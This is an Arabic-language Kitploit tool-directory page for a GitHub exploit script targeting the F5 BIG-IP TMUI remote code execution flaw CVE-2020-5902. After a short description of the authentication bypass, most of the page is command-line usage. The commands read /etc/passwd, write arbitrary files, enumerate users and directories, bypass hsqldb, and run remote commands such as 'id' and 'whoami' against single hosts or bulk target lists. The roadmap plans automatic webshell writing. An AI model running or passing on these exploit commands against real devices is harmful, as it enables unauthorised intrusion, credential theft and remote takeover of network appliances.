Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/thelsa/f5-bigip-rce-cve-2020-5902
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرة
GitHubthelsa/f5-bigip-rce-cve-2020-5902

f5-bigip-rce-cve-2020-5902

أداة فحص تلقائي لـ F5 BIG-IP RCE CVE-2020-5902

عرض المستودع
62172منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة اكتشاف ثغرة F5 BIG-IP RCE (CVE-2020-5902)

==

ملخص

في 6 يوليو 2020، تم الكشف عن ثغرة RCE في F5 BIG-IP TMUI على الإنترنت.

يحتوي مكون TMUI (واجهة إدارة حركة المرور) في F5 BIG-IP على ثغرة تجاوز المصادقة، حيث يوجد اختلاف بين عنوان URL الذي يحلله Tomcat وطريقة request.getPathInfo()، مما يسمح بتجاوز التحقق من الصلاحيات والوصول غير المصرح به إلى جميع وظائف وحدة TMUI، وبالتالي قراءة/كتابة أي ملفات، وتنفيذ الأوامر، وما إلى ذلك.

لمزيد من التفاصيل، راجع إعادة إنتاج ثغرة F5 BIG-IP TMUI RCE (CVE-2020-5902) ونقاط الانتباه

تدعم هذه الأداة: اكتشاف IP واحد، اكتشاف IP بالجملة، قراءة/كتابة الملفات، سرد المستخدمين المعتمدين، سرد الدليل، تنفيذ الأوامر عن بُعد، وفحص تجاوز hsqldb.

بداية سريعة

pip install requests

المساعدة

python f5-bigip-rce-cve-2020-5902.py -h

فحص الـ PoC

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

فحص الـ PoC بالجملة

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

قراءة ملف

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

حفظ ملف

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

سرد المستخدمين المعتمدين

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

سرد الدليل

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

RCE

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

RCE بالجملة

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

فحص تجاوز hsqldb

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

فحص تجاوز hsqldb بالجملة

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

ملاحظة

يُفضل إضافة http:// أو https:// في بداية عناوين IP المجمعة، وإذا لم يتم تحديد بروتوكول، سيتم افتراضيًا إضافة http://

يُنصح بإضافة المعامل --still-exploit إذا سمحت الظروف، لتنفيذ RCE حتى إذا فشل سرد المستخدمين المعتمدين، لزيادة نسبة النجاح.

المهام المتبقية

  1. إرسال طلبات متعددة لزيادة نسبة النجاح في الدفعات، مع الموازنة بين الكفاءة.
  2. دمج استغلال إلغاء التسلسل لواجهة hsqldb.
  3. إضافة كتابة آلي لـ webshell.

التعليقات

المشكلات
lsablog
جيميل: [email protected]
QQ: [email protected]

تنزيل الأداة